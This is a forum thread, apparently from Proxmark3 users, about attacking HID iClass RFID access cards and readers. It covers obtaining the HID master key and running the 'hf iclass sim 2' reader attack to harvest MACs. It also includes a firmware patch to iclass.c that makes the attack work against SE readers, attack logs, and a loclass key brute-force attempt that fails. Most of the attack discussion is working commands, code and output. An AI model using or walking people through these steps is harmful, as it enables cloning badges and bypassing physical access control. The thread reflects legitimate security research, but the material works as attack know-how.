If you have a blank/uninitialized card then you should use the PicoPass default key that can be found in the HID iClass Serial protocol document. If you have a pre-programmed iclass card then you will need to obtain the HID Master authentication key that HID installs in all iClass readers. A method to obtain this key is described in the Milosch Meriac "Heart of Darkness" paper.
It's been my experience that this happens when you attempt the Elite attack against the HID SE readers. However, in the same key system, other types of readers (PCProx) do not return the "unknown command".
The newer iClass SE readers use a slightly different communication sequence when talking to a credential. I suspect that the "Unknown Command" problem that you are experiencing is a result of the SE reader using a four block (32-byte) "Read4" command. The legacy iclass readers only used single block (8-byte) read commands.
One thing that I noticed with the SE readers is that if the credential does not respond to a 32-byte read command then the reader firmware will simply timeout and then retry using single block (8-byte) read operation. Unfortunately the PM3 appears to be halting after receipt of the unsupported "Read4" (32-byte) read command.
Last edited by carl55 (2015-11-03 20:44:01)
Piorun wrote: I have a few blank cards, what is the "HID Master authentication key"?
If you have a blank/uninitialized card then you should use the PicoPass default key that can be found in the HID iClass Serial protocol document. If you have a pre-programmed iclass card then you will need to obtain the HID Master authentication key that HID installs in all iClass readers.
I think my cards are pre-programmed (printed label "HID iClass DL")
CSN: 22 xx xx xx xx xx e0
Mode: Application [Locked]
Coding: ISO 14443-2 B/ISO 15693
Crypt: Secured page, keys not locked
RA: Read access not enabled
Mem: 2 KBits ( 32 * 8 bytes)
AA1: blocks 6-18
AA2: blocks 19-
Valid iClass Tag (or PicoPass Tag) Found - Quiting Search
but as I understand the previous posts, the HID Master key is the same for all new cards?
A method to obtain this key is described in the Milosch Meriac "Heart of Darkness" paper.
I saw this doc, but I don't have access to RW40
Piorun wrote: I have a few blank cards, what is the "HID Master authentication key"?
If you have a blank/uninitialized card then you should use the PicoPass default key that can be found in the HID iClass Serial protocol document. If you have a pre-programmed iclass card then you will need to obtain the HID Master authentication key that HID installs in all iClass readers. A method to obtain this key is described in the Milosch Meriac "Heart of Darkness" paper.
Aydiosmio wrote: It's been my experience that this happens when you attempt the Elite attack against the HID SE readers. However, in the same key system, other types of readers (PCProx) do not return the "unknown command".
The newer iClass SE readers use a slightly different communication sequence when talking to a credential. I suspect that the "Unknown Command" problem that you are experiencing is a result of the SE reader using a four block (32-byte) "Read4" command. The legacy iclass readers only used single block (8-byte) read commands.
One thing that I noticed with the SE readers is that if the credential does not respond to a 32-byte read command then the reader firmware will simply timeout and then retry using single block (8-byte) read operation. Unfortunately the PM3 appears to be halting after receipt of the unsupported "Read4" (32-byte) read command.
can i get master key please help me?
Unless you are able to extract it yourself NO, you cannot have it.
Unless you are able to extract it yourself NO, you cannot have it.
OK, I will try.
Please teach me how to do it myself.
OK, I will try.
Please teach me how to do it myself.
Here is a step-by-step guide: http://www.openpcd.org/images/HID-iCLASS-security.pdf
but you need to have an RW400 reader.
I'm wondering why I get the error 'Unknown command received from reader (len=4): c'
#db# Going into attack mode, 15 CSNS sent
#db# Simulating CSN 000b0ffff7ff12e0
Waiting for a response from the proxmark...
Don't forget to cancel its operation first by pressing on the button
#db# Unknown command received from reader (len=4): c 5 de 64 ff fe 5f 2 1c
#db# Unknown command received from reader (len=4): c 5 de 64 ff fe 5f 2 1c
I have new FPGA (2.4.0):
C:\>proxmark3.exe com3
Qt: Untested Windows version 6.2 detected!
Prox/RFID mark3 RFID instrument
bootrom: /-suspect 2015-11-04 22:15:34
os: /-suspect 2015-11-07 20:05:15
LF FPGA image built for 2s30vq100 on 2015/03/06 at 07:38:04
HF FPGA image built for 2s30vq100 on 2015/11/ 2 at 9: 8: 8
The command should be handled by this code (iclass.c):
} else if(simulationMode == MODE_FULLSIM && receivedCmd[0] == ICLASS_CMD_READ_OR_IDENTIFY && len == 4){
    //Read block
    uint16_t blk = receivedCmd[1];
    //Take the data...
    memcpy(data_generic_trace, emulator+(blk << 3),8);
    //Add crc
    AppendCrc(data_generic_trace, 8);
    trace_data = data_generic_trace;
    trace_data_size = 10;
    CodeIClassTagAnswer(trace_data , trace_data_size);
    memcpy(data_response, ToSend, ToSendMax);
    modulated_response = data_response;
    modulated_response_size = ToSendMax;
simulationMode = 2 <- MODE_FULLSIM
receivedCmd[0] = 0xC <- ICLASS_CMD_READ_OR_IDENTIFY
len = 4
but instead of the above code, the command is handled by this part :
else {
    //#db# Unknown command received from reader (len=5): 26 1 0 f6 a 44 44 44 44
    // Never seen this command before
    Dbprintf("Unknown command received from reader (len=%d): %x %x %x %x %x %x %x %x %x",
        len,
Any idea what is going wrong ?
Last edited by Piorun (2015-11-09 20:31:43)
main reason:
your output says "Going into attack mode" this is not full sim but reader attack mode. so simulationMode = 1 = MODE_EXIT_AFTER_MAC
main reason:
your output says "Going into attack mode" this is not full sim but reader attack mode. so simulationMode = 1 = MODE_EXIT_AFTER_MAC
So command 'hf iclass sim 2' runs mode = 1?
proxmark3> hf iclass sim 2
#db# Going into attack mode, 15 CSNS sent
#db# Simulating CSN 000b0ffff7ff12e0
Waiting for a response from the proxmark...
Don't forget to cancel its operation first by pressing on the button
#db# Unknown command received from reader (len=4): c 5 de 64 ff fe 5f 2 1c
---- Update ---
Thx for explanation
else if(simType == 2)
{
    uint8_t mac_responses[USB_CMD_DATA_SIZE] = { 0 };
    Dbprintf("Going into attack mode, %d CSNS sent", numberOfCSNS);
    int i = 0;
    .....
    cmd_send(CMD_ACK,CMD_SIMULATE_TAG_ICLASS,i,0,mac_responses,i*8);
}else if(simType == 3){
    //This is 'full sim' mode, where we use the emulator storage for data.
    doIClassSimulation(MODE_FULLSIM, NULL);
So how should I handle this 'unknown cmd'?
Last edited by Piorun (2015-11-09 21:54:20)
I did the 'fix'
if((simulationMode == MODE_FULLSIM || simulationMode == MODE_EXIT_AFTER_MAC) && receivedCmd[0] == ICLASS_CMD_READ_OR_IDENTIFY && len == 4){
and can obtain 15 MACs
proxmark3> hf icla sim 2
#db# Going into attack mode, 15 CSNS sent
#db# Simulating CSN 000b0ffff7ff12e0
Waiting for a response from the proxmark...
Don't forget to cancel its operation first by pressing on the button
#db# CSN: 00 0b 0f ff f7 ff 12 e0
#db# RDR: (len=09): 05 cf 57 30 21 5f xx xx xx
#db# Simulating CSN 00040e08f7ff12e0
#db# CSN: 00 04 0e 08 f7 ff 12 e0
#db# RDR: (len=09): 05 6f f0 ee f8 24 xx xx xx
...
#db# Simulating CSN 00050121f7ff12e0
#db# CSN: 00 05 01 21 f7 ff 12 e0
#db# RDR: (len=09): 05 9f 65 d0 03 8e xx xx xx
#db# Done...
Mac responses: 15 MACs obtained (should be 15)
Saved data to 'iclass_mac_attack-1.bin'
proxmark3>
However, the brute force attack doesn't work
proxmark3> hf iclass loclass f iclass_mac_attack-2.bin
Bruteforcing byte 1
Bruteforcing byte 0
Bruteforcing byte 69
1234567891011
...
42452462472482492502512522532542550 Failed to recover 3 bytes using the following CSN
CSN = 000b0ffff7ff12e0
The CSN requires > 3 byte bruteforce, not supported
CSN = 00040e08f7ff12e0
HASH1 = 7802000045014545
The CSN requires > 3 byte bruteforce, not supported
CSN = 00090d05f7ff12e0
HASH1 = 7b0300004501xxxx